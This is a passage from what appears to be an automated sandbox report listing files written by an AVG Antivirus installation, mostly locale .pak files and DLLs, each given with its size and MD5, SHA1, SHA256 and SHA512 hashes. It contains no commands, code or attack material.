                                                                                      4b4d90e2fcc913c061da046b4ad7256c1dba78959d08dee67a471690177dcc8561650e3e0397446fbcb4b9bec89a345b4f2911bbba6a88444ee9b135fecb49b2

                                                                                    • C:\Program Files\AVG\Antivirus\locales\hr.pak

                                                                                      Filesize

                                                                                      313KB

                                                                                      MD5

                                                                                      5ab62a807b85bf1b75c741abba0e9f98

                                                                                      SHA1

                                                                                      641b2360699dfc465a86c0e10b51b4739bc3c770

                                                                                      SHA256

                                                                                      b967887c6313fca79a82168645c1febe43c949f01e0eff3bb8413a04b590e16e

                                                                                      SHA512

                                                                                      d53895053eb4aa230bf9285e1cf0fd46704a9658065f35a265496610c951d09c2436071f421217d3dbe54423624d216d357471763bbec069d3d0d938557fa291

                                                                                    • C:\Program Files\AVG\Antivirus\locales\hu.pak

                                                                                      Filesize

                                                                                      336KB

                                                                                      MD5

                                                                                      ae54cf32c7e5bc9b75615225c5faffea

                                                                                      SHA1

                                                                                      25c6ecee303925f6a273a8d0818a79ff80a74298

                                                                                      SHA256

                                                                                      12949111bf85a2236f071a294a508d99c90587a97b9ba7f61dc8d70e36f5761b

                                                                                      SHA512

                                                                                      eb12669cef9fe09d8f53094aa5df2ac71c8ea334be474a2dacb5f2e8ab56bb56bbb188aac10509873fb7dd3ebb6278d69a050a700cef6388a5caa22736813932

                                                                                    • C:\Program Files\AVG\Antivirus\locales\id.pak

                                                                                      Filesize

                                                                                      279KB

                                                                                      MD5

                                                                                      556874df87f3e62bc9f2baa6353c5d73

                                                                                      SHA1

                                                                                      6e79085ed28fc54399bf7b91a09e69aec0e21e2d

                                                                                      SHA256

                                                                                      60e0f7533dd163da804ac5445f2a80fbda26bc58ce26d8d2de7e2bfd4e5d039c

                                                                                      SHA512

                                                                                      884045476c84c3c18cf41c7a0f4ef98c9df5333284a8d9f27757fa5c19a8c8f07a821b613f7d0fcdfd594fc23fc78ed5d133e2e1e5c965794376e69903f20f8b

                                                                                    • C:\Program Files\AVG\Antivirus\locales\it.pak

                                                                                      Filesize

                                                                                      308KB

                                                                                      MD5

                                                                                      ab258570cfdde79a3595b9deeb6cff01

                                                                                      SHA1

                                                                                      4563fc47d20d0a2ad81e7bd9298a5aecd11ddcda

                                                                                      SHA256

                                                                                      5fef05d02e5c971e8d3f6b5584720ebeed7c7e6e5214320f09ca6f7d84ffa993

                                                                                      SHA512

                                                                                      8a7ef6aff2682a96511e2130de62989e5e3a9ae35b8db66173f7ee0102b1e5f5e0ee7ce2a6f06588ba6e4c577c6d5d5767d0a23f1fa1bce3c2d4b08f7bcc90cd

                                                                                    • C:\Program Files\AVG\Antivirus\locales\ja.pak

                                                                                      Filesize

                                                                                      380KB

                                                                                      MD5

                                                                                      017796cec4dcae8064f6303f2e3174ac

                                                                                      SHA1

                                                                                      1709c22b0a24a74b690deb61dace383484c08bc4

                                                                                      SHA256

                                                                                      8b8407ca872711857c1efe032f0c71df17fbe8d82107a09953e812a20497e582

                                                                                      SHA512

                                                                                      e469f0a63bc649126e0a191dd17c1f5db6e1bbde4b4cec63fe4dfe7c821ff5f1919980ba5bd4962095c0f8c4698ac659693b6ecf1a5feb2832936bc3c47a3af5

                                                                                    • C:\Program Files\AVG\Antivirus\locales\kn.pak

                                                                                      Filesize

                                                                                      748KB

                                                                                      MD5

                                                                                      3a998b7d9c41dac3b2896685116ab994

                                                                                      SHA1

                                                                                      8c7a3272e79fa27017c24905f2b598499a62623b

                                                                                      SHA256

                                                                                      5eaca86a3792d40db18e7d1ce39683471bed1e8b169d716101808930728e1ea0

                                                                                      SHA512

                                                                                      e1e7e49d4f47c6338e9530b0089c1b78f96fd8e088d7ef2edb013c8a503b86f803ec074dcb8ec3998ca981a5373fc37936c102c9d8c971abc66c6233c6758eb0

                                                                                    • C:\Program Files\AVG\Antivirus\locales\ko.pak

                                                                                      Filesize

                                                                                      319KB

                                                                                      MD5

                                                                                      d324469bd2d6e373ab875328c95322ee

                                                                                      SHA1

                                                                                      8c4d3d7e0bb3df9d4028a49b64182d016b47443f

                                                                                      SHA256

                                                                                      549b190c3722d4774cc7a8a2730f858dba66f063840469799adb449184056f9b

                                                                                      SHA512

                                                                                      10a2e751d95422fbc24f5618edac8589d033f19106ee500c83830fb839d639d30f25f2b49ee017767325dfdf833a6e1f9eaaf0c1081c1d339233dfeda9876ae8

                                                                                    • C:\Program Files\AVG\Antivirus\locales\lt.pak

                                                                                      Filesize

                                                                                      336KB

                                                                                      MD5

                                                                                      96406518a17835d2c08ea09f6a4f5269

                                                                                      SHA1

                                                                                      63f2b8ac41adabfc0f58bde2ea02af3ea830cee4

                                                                                      SHA256

                                                                                      336b6bfe35680a19b02d583f332df5d0f5dc6fa5729c2910fb1aa6659e6aaab6

                                                                                      SHA512

                                                                                      342a9d97fa6747b52e462e302cc865e8ee6018aa65ac3d517d4625cd31cef68412e4df9d28ac10e39ed73801342455635ab99a6e167bf7527ac7acd62bab733b

                                                                                    • C:\Program Files\AVG\Antivirus\locales\lv.pak

                                                                                      Filesize

                                                                                      335KB

                                                                                      MD5

                                                                                      a9f1ffb1e215b45afffe7e454dcc082a

                                                                                      SHA1

                                                                                      bcc32731f6fd700496d4445545366cbaa2565220

                                                                                      SHA256

                                                                                      a9cff7d778289b25bca696ff4873e45f098be21f8f4fa3105ae7e2b9b1ef95da

                                                                                      SHA512

                                                                                      c8e692b0ade3dae78b1bcb7d8e3c821fe4d5fe0759180f6f44e603ecda341a8a925cae5986584e98829007bc56a4744ef0082d1feab42781261a6ff7b7b65676

                                                                                    • C:\Program Files\AVG\Antivirus\locales\ml.pak

                                                                                      Filesize

                                                                                      784KB

                                                                                      MD5

                                                                                      5434e2c549029aa898a97f78a65ab13f

                                                                                      SHA1

                                                                                      0361686f5d38363fdc5f67aa5980b6729fedd4a1

                                                                                      SHA256

                                                                                      990b6559fb32e86df8045cdf8687fe7176fb810c18b2032fbb1a093d9b2c901a

                                                                                      SHA512

                                                                                      d05d6e89e0f313622692b2173f715c4c84f80a7fae2ca9bc8b1ecdb02b090e5189d40f5777b647e97344ac65a84c284209256a7e1fb45016d170fde0eb7270c9

                                                                                    • C:\Program Files\AVG\Antivirus\locales\mr.pak

                                                                                      Filesize

                                                                                      631KB

                                                                                      MD5

                                                                                      9aab1dc6721afb63ada134d9d1bc2dc0

                                                                                      SHA1

                                                                                      f0e309e0570e1595709cffc570a799e013a2431f

                                                                                      SHA256

                                                                                      27baebb27c345e367f27b2ea8eb5895c2dadadea282a0fa94a1b2057859736a5

                                                                                      SHA512

                                                                                      9e04ad79a36fe4142544b6d360c0a5227cd7c48e2b0b091085e8d3a011504522da4584460e5234d705d1a9e1fdf695902102e005a30ed2cb2e021b19cd58a708

                                                                                    • C:\Program Files\AVG\Antivirus\locales\ms.pak

                                                                                      Filesize

                                                                                      292KB

                                                                                      MD5

                                                                                      a5d5cfe69299d29812c9dc473c9ceb72

                                                                                      SHA1

                                                                                      768d505ea7678aa2d7f7aba46822de231f1a94fa

                                                                                      SHA256

                                                                                      26457724f3431e3383ac833cbd990834dda8e5e76b961ff931d171aca4221626

                                                                                      SHA512

                                                                                      c8a8e30e67e003720c2fd20150140370e9e8498e2c385bf7e6cce8406b7abafc20fa249f7c3ec92deb5d86145d59717d17d758350bb732f8196129ca82b1e110

                                                                                    • C:\Program Files\AVG\Antivirus\locales\nb.pak

                                                                                      Filesize

                                                                                      288KB

                                                                                      MD5

                                                                                      4795132dc7086e139a2af75a69fa4f63

                                                                                      SHA1

                                                                                      e8acbd586ccb9ca0686c7cbf90f0be5cda48228a

                                                                                      SHA256

                                                                                      8ef002c7ef1d7207b5b41038f16fef198d2343c0539f14090960d6f1295d8c7a

                                                                                      SHA512

                                                                                      466f4a0eb01d2f8d8359016fba96189f152fddcf5c041b05a62c5a7b14b3d93b3f2a4c7eba7e292eb8acacb65afa68b9e9adf4843ef78c410f3d5296656911de

                                                                                    • C:\Program Files\AVG\Antivirus\locales\nl.pak

                                                                                      Filesize

                                                                                      296KB

                                                                                      MD5

                                                                                      cdac79ea10a58cf43ec1e5452c5faef5

                                                                                      SHA1

                                                                                      35bee3062c54f83cebd26c50718081186023c0b8

                                                                                      SHA256

                                                                                      ad97f1708909ba1c2d6119de7536448805f00275273a8b33e743dbf2e7ab2456

                                                                                      SHA512

                                                                                      d9b907c229742808561e87fae306b8e65948ed60b21e90981de1761f162cefdfb95705edf375bf686cec15f7766ada2969fd7428f5ac4334ee83d7d1fa8b4947

                                                                                    • C:\Program Files\AVG\Antivirus\locales\pl.pak

                                                                                      Filesize

                                                                                      325KB

                                                                                      MD5

                                                                                      419e3f381b0e0f080ec230a9f1b80e66

                                                                                      SHA1

                                                                                      c279ff058f3f3ef086715ea2206f24cf7aa75818

                                                                                      SHA256

                                                                                      a5fdcd13f711d4665d1960f512f1bd229dbbacb24c86bbb3773a905e2dd24b33

                                                                                      SHA512

                                                                                      d7896ce61b64ae92f5af2774f3a996516d24e89d7cc6f84429cbf3f70aa3d87404fca8c6d242b5a088bdc1a7a73e229628ca7dbec81d6976734632cb5291e9b7

                                                                                    • C:\Program Files\AVG\Antivirus\locales\pt-BR.pak

                                                                                      Filesize

                                                                                      309KB

                                                                                      MD5

                                                                                      3a4f9d62b91bc0eeab11f0865d4be286

                                                                                      SHA1

                                                                                      c56a98f46b9f0ef8c5180d176cfb7773a05ce941

                                                                                      SHA256

                                                                                      3051442a3e905dfdfb8f17f49d12a3722c511faf9aba0fc86d577dac90e3b654

                                                                                      SHA512

                                                                                      39a81774c90476e4e8ab80b0784a8923c698040f51cd6acd08a50b5d2f90a7a22242296ca5793ce39ccc93120df3f40eb2abaf6317ffed8aebb986ff28946081

                                                                                    • C:\Program Files\AVG\Antivirus\locales\pt-PT.pak

                                                                                      Filesize

                                                                                      313KB

                                                                                      MD5

                                                                                      4fbebc23d7a0aaa6dcd426777898bfe6

                                                                                      SHA1

                                                                                      959ce4fa97c24143c3dc28e9420e6d6c76a7266e

                                                                                      SHA256

                                                                                      3cda10980a23de97163a2c06b31829cca1ec3da63b0bb0a246126f402c19b16a

                                                                                      SHA512

                                                                                      a1c4052a40059dd5a417d87935c9700c3cd127b63ab9191ca62e448b09109762906638c5d80abc0565711425f52c5ec3fffeed87aae70c0888199c45a4374880

                                                                                    • C:\Program Files\AVG\Antivirus\locales\ro.pak

                                                                                      Filesize

                                                                                      320KB

                                                                                      MD5

                                                                                      de48484707e8770f47d27f0f5e2358e6

                                                                                      SHA1

                                                                                      014295dc0215191606e40b2fd757a5a637164571

                                                                                      SHA256

                                                                                      5fe258168978f52d2b3c6f063c7a7c381a70ac06e128ababe6656375025fc088

                                                                                      SHA512

                                                                                      653da7faf9f75477c084267e30a288f52fd1260b77f7d1552981034b033d796b7ef18a6f77214179521213375f4b43a7daf69e4977e487cda90c9d7e96e82e52

                                                                                    • C:\Program Files\AVG\Antivirus\locales\ru.pak

                                                                                      Filesize

                                                                                      513KB

                                                                                      MD5

                                                                                      dcbcbf5867918c54c5f8f267664056aa

                                                                                      SHA1

                                                                                      f3b706adb3c222a84cdc92bf97ce26f8aa0042f2

                                                                                      SHA256

                                                                                      fb9da2895730be8d82924d01d5e0dc28c454d8b91a1aab556d255462c374bf16

                                                                                      SHA512

                                                                                      429896d3e774eeb6f447f9f80f1c148685df728b343899e12e58bd4d58caa70d3b38e264037a720a2074e909e3e3722c8393a21b4f4ced2157da554bdfe40f37

                                                                                    • C:\Program Files\AVG\Antivirus\locales\sk.pak

                                                                                      Filesize

                                                                                      330KB

                                                                                      MD5

                                                                                      0ac44c1ad8985cda2e3ef0bc2082fef9

                                                                                      SHA1

                                                                                      66f721bac3f1ff5be9fb7b926b87341d303a60b2

                                                                                      SHA256

                                                                                      ae4a8e4e3706626f7ba53cb395e2472389bdc1319fbbaaca608ee1ae3c918e0a

                                                                                      SHA512

                                                                                      5ca7d91b3ac747241acd8b76176b19a62cb44c62d991e2db6631097df9276c277d19d3ca6713e382ee69f61550b5d40daa03da838d80f04727a03a97a0b28da7

                                                                                    • C:\Program Files\AVG\Antivirus\locales\sl.pak

                                                                                      Filesize

                                                                                      315KB

                                                                                      MD5

                                                                                      dbb839665d4d78d71c9d49b85a0ec0bc

                                                                                      SHA1

                                                                                      1b8662843a1acc58ef120d62ffcd19c764f8613d

                                                                                      SHA256

                                                                                      80ab358cfdafe9533005571d832377a08e5df4801a6f61be7aeb2afe626691b9

                                                                                      SHA512

                                                                                      86f7e656d140e03f68b0d7ad8c7d9168029e3fa1c8d75cddb2101dbbcebd772dfdab1da3c568effc41c1bb6b3ed0a588f4be50ff307ae14be356ccd101025950

                                                                                    • C:\Program Files\AVG\Antivirus\locales\sr.pak

                                                                                      Filesize

                                                                                      488KB

                                                                                      MD5

                                                                                      d13a44314bcd033fc50fc608ad1ab91e

                                                                                      SHA1

                                                                                      7abb6cee31c4873b717910fa9c0669130343ec5e

                                                                                      SHA256

                                                                                      6615bd59f0759e6af09309b8344c0e7f0c2dc2bec55beaa0afd1bbe09af7596d

                                                                                      SHA512

                                                                                      5efaf765533e2bbf3095a05c55b3a144c32cec14812d743a5b7de47b7ebc7429088b7b94bbd498568189ee0c4cf1056f2766ff341d46303e23410cc84574c798

                                                                                    • C:\Program Files\AVG\Antivirus\locales\sv.pak

                                                                                      Filesize

                                                                                      288KB

                                                                                      MD5

                                                                                      335c90be59afb384203afbe08a9d5d48

                                                                                      SHA1

                                                                                      30e945993e943e1e6840b8020bd78a845dc3b745

                                                                                      SHA256

                                                                                      eca3cbaceb77840c7d861b559ee3ceadafa9f7777856112c9bd30b5a8d517b9b

                                                                                      SHA512

                                                                                      5bbfc5404f330b047365b2fb73403f5598c696eee0659fe987c0fbacab5a949f38ce5b288bb32702cfb57e15502426a3efc373932da2d01e68bf031f57251af2

                                                                                    • C:\Program Files\AVG\Antivirus\locales\sw.pak

                                                                                      Filesize

                                                                                      296KB

                                                                                      MD5

                                                                                      8c427fc5a5eda451f60c0e4e6a2c6034

                                                                                      SHA1

                                                                                      752eab30cfb87e90ce5cd887786e115f15a8a178

                                                                                      SHA256

                                                                                      178590c5a7fcf0d41d93724de8aa04f4bad7b9cec119a54a4115f96f9219ef3c

                                                                                      SHA512

                                                                                      e09599a47f5f5a2295fc13cf0ad0aa45006852eec5956092677b212a5cdb6a787349a12f78c2af0529329b51a87fe0cd614e8b452b2a049af7ba51b893f1c7ae

                                                                                    • C:\Program Files\AVG\Antivirus\locales\ta.pak

                                                                                      Filesize

                                                                                      761KB

                                                                                      MD5

                                                                                      35b454a9361898f148f056d02e1adbd9

                                                                                      SHA1

                                                                                      c3b0dc8dffda8ceecd0f43d3b6845e5c2e031284

                                                                                      SHA256

                                                                                      7f047181c386fceb204184cf02d1ad1859e5293db04122c5c6585ce7bda8da0f

                                                                                      SHA512

                                                                                      11d18f6d5ad0cb7ce3b9a4cf7aecd5ffd2fd8a72a65ce48afe034f7b11269cbc109f1fdb9448021218b31cfd64f52c53875cb3f0cee5ce2243938f449ccd7201

                                                                                    • C:\Program Files\AVG\Antivirus\locales\te.pak

                                                                                      Filesize

                                                                                      710KB

                                                                                      MD5

                                                                                      facf3ab50cf9fd9a08f951a3cf3d42b1

                                                                                      SHA1

                                                                                      44f9874dc0bf80907ba5f1189350ef741f168cbb

                                                                                      SHA256

                                                                                      3e19980886a66ca92ea762b86ab44fac8e71fb16fbf4dd13864840923c9bfd19

                                                                                      SHA512

                                                                                      1a32a1f82d92f2db9556a50b05329415d995a3038fad7e21e82526b976e75bf171367eefad6dfab2ebf388862c5f0154de2c7772f6ac617577e61ea1a99bc7f6

                                                                                    • C:\Program Files\AVG\Antivirus\locales\th.pak

                                                                                      Filesize

                                                                                      599KB

                                                                                      MD5

                                                                                      0b8590d79fddc502679b69005576584a

                                                                                      SHA1

                                                                                      37c6907483849773784652835ff5184ad88107ae

                                                                                      SHA256

                                                                                      a06797086a3ae1bd42bd93fdfb239a787d521cbabdda56a0c15aa255def81e5c

                                                                                      SHA512

                                                                                      c9f9ae0c139b9866e568246701473d01fd8d190024411c63859574c004befc59b8e2477a3ab9ab48b92f425744ee5e523d0f05625605dbce95d3449acb201ea0

                                                                                    • C:\Program Files\AVG\Antivirus\locales\tr.pak

                                                                                      Filesize

                                                                                      306KB

                                                                                      MD5

                                                                                      d32db9a61c2f11de5df3fe64153a48ec

                                                                                      SHA1

                                                                                      9d9c5731e0c17600ba62ff1bb9a833602e4eeacf

                                                                                      SHA256

                                                                                      f25ff7a18aebd6ecaf56c2b125aaa22a1699fe2ee9cc6f190f6525d824992f11

                                                                                      SHA512

                                                                                      43c939ab2fa18bf7009ed3594de3bcfe0455797aaa2747841957678f31410a4b368c5f5fec684d9ee1487bb40bfd8395edabb97312d97be317653df9cfb58a61

                                                                                    • C:\Program Files\AVG\Antivirus\locales\uk.pak

                                                                                      Filesize

                                                                                      511KB

                                                                                      MD5

                                                                                      49aaf394d0376e4bf0639fd928f0008b

                                                                                      SHA1

                                                                                      ecfb3e22c86323f5571c502f020ddda2d2c680e3

                                                                                      SHA256

                                                                                      23752a372251b782f35f6fca4a17dc260159eca4620ddb610f5ff7720d496a18

                                                                                      SHA512

                                                                                      e414936a5b36926f9bb4f01c7271c38d6d868c1c0341585b5c73e848928d0a03b5849ae088f964df1d77478a739edd938680b98bf75f10f0a23944843eb2607c

                                                                                    • C:\Program Files\AVG\Antivirus\locales\vi.pak

                                                                                      Filesize

                                                                                      360KB

                                                                                      MD5

                                                                                      c31f5ba58a8a0b114e1061c7c2a8f43e

                                                                                      SHA1

                                                                                      beeb19c5164c2ca5bd63a60c0499262ce8467d75

                                                                                      SHA256

                                                                                      66468ec740624dc5ca9988e2aea145bbe915333db3327653f130ec4a426baf17

                                                                                      SHA512

                                                                                      784f0426e303639e7174bea1ffe83973bfaaf18c7d61544cd4ee92e417442b085f6a5065593d608326ec8bb7374efe1c44c5c6d15811ef2449baa5597b502cbb

                                                                                    • C:\Program Files\AVG\Antivirus\locales\zh-CN.pak

                                                                                      Filesize

                                                                                      265KB

                                                                                      MD5

                                                                                      56c3b32e97f3c52cebe29937806a5325

                                                                                      SHA1

                                                                                      25f4295535a90c26fb9bc476bc915d5805803db7

                                                                                      SHA256

                                                                                      70070d44c9e5ec62c57b574837423f849ed363c0167e8019afd49a93c74c7e3a

                                                                                      SHA512

                                                                                      207bf51c44900e25d7d2d5a128e11b11f972490221d7c3f8a28b77d0921860f059dc92ab96f687da4a7fa6defc87a1896b1fdbbff31a9bf45dd2864cb78c1cbf

                                                                                    • C:\Program Files\AVG\Antivirus\locales\zh-TW.pak

                                                                                      Filesize

                                                                                      263KB

                                                                                      MD5

                                                                                      c41412769245d56fbd7d1f114f238700

                                                                                      SHA1

                                                                                      ff3ec93946677884128267d2d84869e5c6b63afe

                                                                                      SHA256

                                                                                      70ea00381aa8ae93ce9f64ae29ad3de0263ee5991861120c8df7603bac540b84

                                                                                      SHA512

                                                                                      13ca3d0fd0b4158f2bb751791870bc0a2199af3c39e66c1f971b2cfd6d536d9642ecab82bbe814908020330eb351b4a045e0958a22bdaec330e161b8a3f6087a

                                                                                    • C:\Program Files\AVG\Antivirus\log.dll

                                                                                      Filesize

                                                                                      405KB

                                                                                      MD5

                                                                                      31748dd7f3c00312b179e9a31e6cd58b

                                                                                      SHA1

                                                                                      d2349fe770e1a5f5ab337be1ec6569f77fc9201e

                                                                                      SHA256

                                                                                      ab4b7b3aad7005d05c971970db91fdf1f6653bf230cae4aa847a7845559e64b3

                                                                                      SHA512

                                                                                      45441ba162e9fdaf32dddf30b439c9f428fd37dc49d143947bb8c69c1e0a59fec20e4ee69d2cffa522dde64a1302b707c6ac0cceded736ee5286662021c19fb2

                                                                                    • C:\Program Files\AVG\Antivirus\mfc140.dll

                                                                                      Filesize

                                                                                      5.4MB

                                                                                      MD5

                                                                                      cad16fe5795c362b05905bed436b5e1f

                                                                                      SHA1

                                                                                      20b845f469e94e533b545bfe05fe5ede0a3fe32a

                                                                                      SHA256

                                                                                      706583f44a797afc17d2c394eb792a33f2aab0829a1f5867cc36fd94f00dcb74

                                                                                      SHA512

                                                                                      b2b1ebda861ee710700bca22c38ae33043717036c3cc07a236670b6c9c2f006a20b28c2eb98c4151259bbb670ce159e3d346a0854f73fe37ac1124487c29aced

                                                                                    • C:\Program Files\AVG\Antivirus\mfc140u.dll

                                                                                      Filesize

                                                                                      5.4MB

                                                                                      MD5

                                                                                      575634e4b6719eb8600605a31c32750f

                                                                                      SHA1

                                                                                      f327886d113db53d209d9896f0cc8df1f0295efb

                                                                                      SHA256

                                                                                      9e6d05d9b6d8bbe66c647a1f07b3be2234f070c9938a10724dca1ce3fc05ec12

                                                                                      SHA512

                                                                                      0da85512e6ac5673e51ef32e4e95a60416c80f76c4612194878f64b6a70ff3c026717c0708480d6141f4ffd8c881157e67ce703936ac5529d2bc225909f00e5a

                                                                                    • C:\Program Files\AVG\Antivirus\mfcm140.dll

                                                                                      Filesize

                                                                                      94KB

                                                                                      MD5

                                                                                      e0f0d9c1ea05cac4bfbbe7c2247aa61f

                                                                                      SHA1

                                                                                      ac73392983afb5a55c245c79b55d5506db6fe8c8

                                                                                      SHA256

                                                                                      f0e82a2f1290346217138b3d892cd916d8ca69855f63977d9561f5278d350332

                                                                                      SHA512

                                                                                      bbf3d0db25821381ece3cfa161447513f28c2ffbf107ff6c8752cf61cbe2c497d7e5c154533a35da95505472dc475ce83ac89baff5762ef9cae7d83c89b14ce3

                                                                                    • C:\Program Files\AVG\Antivirus\mfcm140u.dll

                                                                                      Filesize

                                                                                      94KB

                                                                                      MD5

                                                                                      cd97b86463a7755aa6902a18625993b4

                                                                                      SHA1

                                                                                      3cc6675550719994b237635a62d0874d4f3d604d

                                                                                      SHA256

                                                                                      05f3d04060880d09a4c4f03fa8a17cf15b04e9f7f764fa346e11ce4e98d2b777

                                                                                      SHA512

                                                                                      c454dccc466e10a10ffb7161398eec473b70336527063a18e353ab25a5d7a2576176c2af2a7096c47cb98acd826fadc0bf6c1e0e6b7cf7421528c8be07d00a35

                                                                                    • C:\Program Files\AVG\Antivirus\module_lifetime.dll

                                                                                      Filesize

                                                                                      258KB

                                                                                      MD5

                                                                                      ec287209fd88cc6c8c30c5fbeacfe410

                                                                                      SHA1

                                                                                      41f0b06e2f4308e28c03e4717a53e21b10412baa

                                                                                      SHA256

                                                                                      76abd54db38eb73e5226f73d950cebbb9c9a1d902193b2452784292c29822cbc

                                                                                      SHA512

                                                                                      313f168a848ea1fbfe3e5b348e7b655cecb3c9489b8104de2f9ee6dc2f36f7841eeb1608f24a81388ebdd03e7ef3095db136b76a40cc7f22ca865927a1b21a86

                                                                                    • C:\Program Files\AVG\Antivirus\nos.dll

                                                                                      Filesize

                                                                                      1.3MB

                                                                                      MD5

                                                                                      f09372736f35f3284a13d05aeea6d42b

                                                                                      SHA1

                                                                                      d3fd7e9c601de8e27470cd1333fefc5909913e02

                                                                                      SHA256

                                                                                      25d4b162133f2ea436cbdd77ae8927ff72321a497441fdc07dcc7627b08853da

                                                                                      SHA512

                                                                                      b58ea43daaa4aa64cbaf39ca986918463835eb7e267c320674592dfd0faa1d90baaa7544ac9aa10eab4e012491ba189d5804419f373dbea8d49aedafc3345055

                                                                                    • C:\Program Files\AVG\Antivirus\ntp_time.dll

                                                                                      Filesize

                                                                                      570KB

                                                                                      MD5

                                                                                      8f508830e99916697702d73d4aa93277

                                                                                      SHA1

                                                                                      33415f6225512f3dc483e0eea9b68b8aafba08df

                                                                                      SHA256

                                                                                      4bb6e4a358f7c34dc95cc972804a93501266335aacb9a53e199a5f5d4f452f37

                                                                                      SHA512

                                                                                      512736efd194bfb4817c8a4c973611a002f53893a90a539e00aaf7f0df67d13550a7d8a32b775bcbb83cc06b06a629d33618ed050332dd0643328b612c895771

                                                                                    • C:\Program Files\AVG\Antivirus\overseer.exe

                                                                                      Filesize

                                                                                      2.3MB

                                                                                      MD5

                                                                                      d53a877b6bcb2219afb5a4095eb9407f

                                                                                      SHA1

                                                                                      10d1e7dfc4dd93a56f862f6c8ee0266348569410

                                                                                      SHA256

                                                                                      96147244ab15493830f42bac46676ceb522b5bd9c52c12f97345dc52c6bb1229

                                                                                      SHA512

                                                                                      791baefe6637d7e22a8e3ab251f70399117c3d83f98d5f4f1c5f6e9ec3bd4480f3138406b3ee87411d710054760f44c073d3616b5f8b2f04159e735d6ea38e5e

                                                                                    • C:\Program Files\AVG\Antivirus\perfstats.dll

                                                                                      Filesize

                                                                                      314KB

                                                                                      MD5

                                                                                      daae3c01b24688a51bfe50cf84b1193a

                                                                                      SHA1

                                                                                      115dfb36fee18dc18a7bbce9b4fe982b3478c846

                                                                                      SHA256

                                                                                      93918cc2e7e8c266572d41ec95f6545cd1729acad8fb091088cd63682b59f53b

                                                                                      SHA512

                                                                                      3d7b2c6e79c3d104521fb471860431969d82ddf0f676596244793388fce046b2ab4668bd8c1b4f03dc828fe6e2ade1fc2171789dd0da5f4f1832eb19d7b8a30c

                                                                                    • C:\Program Files\AVG\Antivirus\process_monitor.dll

                                                                                      Filesize

                                                                                      634KB

                                                                                      MD5

                                                                                      4616735c914ceb3914849198f2aa17fe

                                                                                      SHA1

                                                                                      f4981e462087544496dcbe6d1bb091bef7cec7c3

                                                                                      SHA256

                                                                                      7f120b84b7aadbd2440b4dbf4a15fe6a1ba502189522bb66d7a65d5305f68a4d

                                                                                      SHA512

                                                                                      16d3108418dbaa543cb1a9c69c5d06b25857a0154771c27cc031b5516ef71d05c6291a23a36ea07c07115ce79646a5ef282a7c518b3d3c2d89c12e93c1d419de

                                                                                    • C:\Program Files\AVG\Antivirus\protobuf.dll

                                                                                      Filesize

                                                                                      2.4MB

                                                                                      MD5

                                                                                      c54e7ec57e1fd9155ac8db7d5a4c5ac8

                                                                                      SHA1

                                                                                      c74d4ba9044c379c672d613168a70c7398dfaeed

                                                                                      SHA256

                                                                                      7bef0f11011c0563e927789bc82b44bad51c44a7607db3aed5feeca1751ef08b

                                                                                      SHA512

                                                                                      cb6c8b51aab9bf43bab581ae036bdcb0e0ce8fec3ef1815530ee10885b90aa484bce8cb0b7d28f10a7431aed58f707eb2a05e3574661bdcf73bdddda61aab484

                                                                                    • C:\Program Files\AVG\Antivirus\resources.pak

                                                                                      Filesize

                                                                                      6.7MB

                                                                                      MD5

                                                                                      bad3a80c0bbbda22c237407afe0a82a4

                                                                                      SHA1

                                                                                      00cfd3358c40c549d4709f4530de277ec349edda

                                                                                      SHA256

                                                                                      59a0ad87f4aa0bbfc2d1462ca7d5e760e2f6f2911c6c31f0fd450a9bea7dc684

                                                                                      SHA512

                                                                                      110a39d7c26745167d31edfbb065818afc68cf6bab273f967852024bbf7c4566920f93eb207c4f17105386f18cd9289d35ac66eef3c1ed5f90e5628568222fb7

                                                                                    • C:\Program Files\AVG\Antivirus\sched.exe

                                                                                      Filesize

                                                                                      519KB

                                                                                      MD5

                                                                                      d41399808cbb6ae0f977d2085985f182

                                                                                      SHA1

                                                                                      41a5fe7e87d1c5de59e06b167608c91813a714d6

                                                                                      SHA256

                                                                                      5639820ef75e3f11f36e0ded620fadc4d05f146760d5fba05b996c6ef7bcc23d

                                                                                      SHA512

                                                                                      876d16c7c74c905bd96fb9f1f47cb2e0d2124a4dd8f10f385e4adf7d2abb272d16db5835116d628c7477b1ca521a300d6157a4eb2903d759363958fdb3b35425

                                                                                    • C:\Program Files\AVG\Antivirus\serialization.dll

                                                                                      Filesize

                                                                                      588KB

                                                                                      MD5

                                                                                      a5c037cc437170cb2bd469f22dcbdb96

                                                                                      SHA1

                                                                                      2c9924696be2b78ed888b5e457dbcff85f63b64f

                                                                                      SHA256

                                                                                      29bf853ca35fefdb5cbd366f879c9b865f042111c6cfb44ec2e2048323b2c155

                                                                                      SHA512

                                                                                      a87385a0660b7f3403fe8a134dc6aac0f1a9a496847eb95cb0873d74a46314a66ad08d48f58c510d8bb72fcace44ff81860cdded9547ba3285a63feecb027529

                                                                                    • C:\Program Files\AVG\Antivirus\setup\04b63c04-c297-4406-9434-249b48f956b2.ini

                                                                                      Filesize

                                                                                      2B

                                                                                      MD5

                                                                                      81051bcc2cf1bedf378224b0a93e2877

                                                                                      SHA1

                                                                                      ba8ab5a0280b953aa97435ff8946cbcbb2755a27

                                                                                      SHA256

                                                                                      7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

                                                                                      SHA512

                                                                                      1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

                                                                                    • C:\Program Files\AVG\Antivirus\setup\4188676d-21bb-405d-ba53-d3efbf54516a\A7D569CD35EBB9BCB729A08550C06714.rmt

                                                                                      Filesize

                                                                                      7KB

                                                                                      MD5

                                                                                      fd34bd412bd156f39155f92a9ef59e6f

                                                                                      SHA1

                                                                                      ea1937dd31925d64d77b9f6a74284a4d4f1b0aef

                                                                                      SHA256

                                                                                      48516bd1a4aa53abb53b7ed963f635bb5f730d996b745bb43dcf37c12bd67560

                                                                                      SHA512

                                                                                      734ce0aeb2e7390348ce1e62b6928d8977fb2e1aa04bbcd04b4f439e4e117ce539ad83d522ceec852ae6184ea719384d8b60fe34f85aa9530b3c82b40df79639

                                                                                    • C:\Program Files\AVG\Antivirus\setup\4188676d-21bb-405d-ba53-d3efbf54516a\DA6917D0CC7238A4398D0E99389EEFBD.rmt

                                                                                      Filesize

                                                                                      10KB

                                                                                      MD5

                                                                                      f1ea67e978cf34d0ec30983123ed9a47

                                                                                      SHA1

                                                                                      87d93af55c39824d4e9fb9b21fbb21560ced7c31

                                                                                      SHA256

                                                                                      08f4a38c5de99e7dd80530c19fbc350e30873ba87bb43ef63488f19166ee52be

